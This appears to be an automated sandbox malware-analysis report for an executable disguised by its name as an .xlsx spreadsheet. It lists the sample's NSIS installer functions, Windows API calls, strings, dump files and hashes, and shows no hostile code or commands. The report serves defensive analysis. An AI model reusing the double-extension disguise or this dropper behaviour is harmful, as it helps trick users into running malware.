CallWindowProcW.USER32(?,?,?,?), ref: 004051E6

Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8

Strings

, xrefs: 00405176

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69

Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
CloseHandle.KERNEL32(?), ref: 004056F5

Strings

Error launching installer, xrefs: 004056D6

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D

Function 0040388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403861,76233420,0040366C,?), ref: 004038A4
GlobalFree.KERNEL32(?), ref: 004038AB

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9

Function 004059DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 004059E5
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 004059F5

Strings

C:\Users\user\Desktop, xrefs: 004059DF

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3125694417
Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

Analysis Process: 09-FD-94.03.60.175.07.xlsx.exePID: 5412, Parent PID: 964COMMON

Non-executed Functions

Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B86
GetDlgItem.USER32(?,?), ref: 00404B91
GlobalAlloc.KERNEL32(?,?), ref: 00404BDB
LoadBitmapW.USER32(0000006E), ref: 00404BEE
SetWindowLongW.USER32(?,?,00405166), ref: 00404C07
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C1B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C61
DeleteObject.GDI32(00000000), ref: 00404C64
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
GetWindowLongW.USER32(?,?), ref: 00404D9F
SetWindowLongW.USER32(?,?,00000000), ref: 00404DAD
ShowWindow.USER32(?,00000005), ref: 00404DBE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F35
SendMessageW.USER32(?,?,00000000,?), ref: 00404F59
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
ImageList_Destroy.COMCTL32(?), ref: 00404F8E
GlobalFree.KERNEL32(?), ref: 00404F9E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
ShowWindow.USER32(?,00000000), ref: 0040513D
GetDlgItem.USER32(?,000003FE), ref: 00405148
ShowWindow.USER32(00000000), ref: 0040514F

Strings

, xrefs: 00405127
N, xrefs: 00404DF9
M, xrefs: 00404D18

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58

Function 0040335A Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 383stringfilecomCOMMON

Download Yara Rule

APIs

#17.COMCTL32 ref: 00403379
SetErrorMode.KERNEL32(00008001), ref: 00403384
OleInitialize.OLE32(00000000), ref: 0040338B

Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062CF
Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0

SHGetFileInfoW.SHELL32(004206A8,00000000,?,?,00000000), ref: 004033B3

Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55

GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
CharNextW.USER32(00000000,00434000,?), ref: 00403403
GetTempPathW.KERNEL32(?,00436800,00000000,?), ref: 0040353B
GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
GetTempPathW.KERNEL32(?,00436800,00436800,\Temp), ref: 0040356C
lstrcatW.KERNEL32(00436800,Low), ref: 00403574
SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
DeleteFileW.KERNEL32(00436000), ref: 004035A1
OleUninitialize.OLE32(?), ref: 0040366C
ExitProcess.KERNEL32 ref: 0040368C
lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
ExitProcess.KERNEL32 ref: 00403827

Strings

Error launching installer, xrefs: 00403623
Low, xrefs: 0040356E
TEMP, xrefs: 00403580
SeShutdownPrivilege, xrefs: 004037BE
~nsu.tmp, xrefs: 00403692
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336D
NSIS Error, xrefs: 004033B9
TMP, xrefs: 00403588
\Temp, xrefs: 00403552

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-1875889550
Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

Function 004057D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00436800,76232EE0,00434000), ref: 004057F9
lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405841
lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405864
lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040586A
FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040587A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
FindClose.KERNEL32(00000000), ref: 00405929

Strings

\*.*, xrefs: 0040583B

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E

Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44

Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0), ref: 00406296
FindClose.KERNEL32(00000000), ref: 004062A2

Strings

8WB, xrefs: 0040628C

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8WB
API String ID: 2295610775-3088156181
Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D

Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405390
GetDlgItem.USER32(?,000003EE), ref: 0040539F
GetClientRect.USER32(?,?), ref: 004053DC
GetSystemMetrics.USER32(00000015), ref: 004053E4
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
ShowWindow.USER32(?,?), ref: 00405480
GetDlgItem.USER32(?,?), ref: 004054A1
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
GetDlgItem.USER32(?,?), ref: 004053AE

Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD

GetDlgItem.USER32(?,?), ref: 004054F3
CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
CloseHandle.KERNEL32(00000000), ref: 00405508
ShowWindow.USER32(00000000), ref: 0040552C
ShowWindow.USER32(?,?), ref: 00405531
ShowWindow.USER32(?), ref: 0040557B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
CreatePopupMenu.USER32 ref: 004055C0
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
GetWindowRect.USER32(?,?), ref: 004055F4
TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040560D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
OpenClipboard.USER32(00000000), ref: 00405655
EmptyClipboard.USER32 ref: 0040565B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
GlobalLock.KERNEL32(00000000), ref: 00405671
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
GlobalUnlock.KERNEL32(00000000), ref: 004056A5
SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
CloseClipboard.USER32 ref: 004056B6

Strings

&B, xrefs: 00405621
{, xrefs: 00405599

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$&B
API String ID: 590372296-2518801558
Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
ShowWindow.USER32(?), ref: 00403D1B
DestroyWindow.USER32 ref: 00403D2F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
GetDlgItem.USER32(?,?), ref: 00403D6C
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
IsWindowEnabled.USER32(00000000), ref: 00403D87
GetDlgItem.USER32(?,00000001), ref: 00403E35
GetDlgItem.USER32(?,00000002), ref: 00403E3F
SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
GetDlgItem.USER32(?,00000003), ref: 00403F50
ShowWindow.USER32(00000000,?), ref: 00403F71
EnableWindow.USER32(?,?), ref: 00403F83
EnableWindow.USER32(?,?), ref: 00403F9E
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
EnableMenuItem.USER32(00000000), ref: 00403FBB
SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
SetWindowTextW.USER32(?,004226E8), ref: 00404023
